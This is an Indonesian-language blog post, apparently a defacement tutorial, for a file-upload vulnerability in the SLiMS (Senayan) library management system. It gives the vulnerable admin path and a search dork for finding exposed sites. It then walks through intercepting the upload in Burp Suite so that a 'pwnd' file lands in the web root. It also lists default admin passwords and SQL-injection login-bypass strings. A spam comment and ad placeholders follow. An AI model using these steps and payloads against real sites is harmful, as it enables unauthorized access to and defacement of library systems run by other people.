Slims CMS Senayan Library Management System File Upload

Deface dengan Exploit : Slims CMS Senayan Library Management System File Upload
Reference Link : cxsecurity.com/ascii/WLB-2018050260
exploit : admin/modules/bibliography/pop_attach.php
dork :intext:"This Software is Released Under GNU GPL License Version 3"
proof of concept :
buka exploitnya, example : http://localhost/admin/modules/bibliography/pop_attach.php buka brup suite / tamper data isi judul = asal upload berkas file txt lu, isinya pwnd by bapakkau buka brup suite , caranya biar filenya keupload di home root ss :

$file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); lalu klik forward done. PoC 2 : - Login pakai default username/password = admin/admin admin/admin123 admin' --/admin' -- anything' OR 'x'='x/anything' OR 'x'='x ' or 1=1 limit 1 -- -+/' or 1=1 limit 1 -- -+ - Lalu Upload file .txt Pakai Cara yang sama kayak tutor yang diatas Terima kasih. selamat mencoba

1 Response to "Slims CMS Senayan Library Management System File Upload"

  1. This is such a great resource that you are providing and you give it away for free. I love seeing blog that understand the value of providing a quality resource for free. newtown login

    ReplyDelete

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel